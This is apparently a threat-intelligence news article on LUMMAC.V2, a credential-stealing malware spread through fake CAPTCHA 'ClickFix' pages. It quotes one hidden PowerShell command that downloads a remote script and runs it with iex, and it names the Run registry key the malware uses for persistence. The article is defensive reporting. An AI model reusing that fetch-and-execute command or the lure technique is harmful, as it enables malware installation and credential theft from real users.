Cybersecurity researchers have recently uncovered a sophisticated evolution of the LUMMAC credential-stealing malware, now rewritten from C to C++ and operating with enhanced capabilities. This new variant, designated LUMMAC.V2, targets a broad spectrum of applications, including web browsers, cryptocurrency wallets, password managers, remote desktop applications, email clients, and instant messaging platforms.
The primary function of LUMMAC.V2 is to exfiltrate sensitive information such as credentials, login details, emails, personal data, system information, screenshots, and cookies. Once collected, this data is compressed into a ZIP archive and transmitted over HTTP connections to the attacker’s command-and-control (C2) server.
What sets LUMMAC.V2 apart is its reliance on social engineering tactics rather than exploiting technical vulnerabilities. The malware propagates through malicious links embedded in search results, particularly those related to cracked software, popular movies, or music releases. Unsuspecting users who click on these links are redirected to deceptive websites that present fake security verification pages, often mimicking CAPTCHA challenges.
A key component of LUMMAC.V2’s attack methodology is the ClickFix technique, which deceives users into executing commands without their knowledge. Upon landing on a fake CAPTCHA page, victims are instructed to press Windows+R to open the Run dialog box, then press CTRL+V to paste a command that has been surreptitiously copied to their clipboard, and finally press Enter to execute it.
The underlying PowerShell command executes with the -W Hidden parameter to prevent any console window from appearing. A typical command looks like:
“`powershell
PowerShell.exe -W Hidden -command $url = ‘https://finalstepgo[.]com/uploads/pnk3.txt’; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
“`
This command downloads and executes additional malicious payloads, establishing persistence by creating registry entries under `HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`. This ensures the malware executes automatically at each system startup, maintaining its presence on infected systems.
The LUMMAC.V2 campaign represents a significant threat due to its extensive data theft capabilities and its exploitation of human behavior rather than technical vulnerabilities, making traditional security measures less effective at prevention.
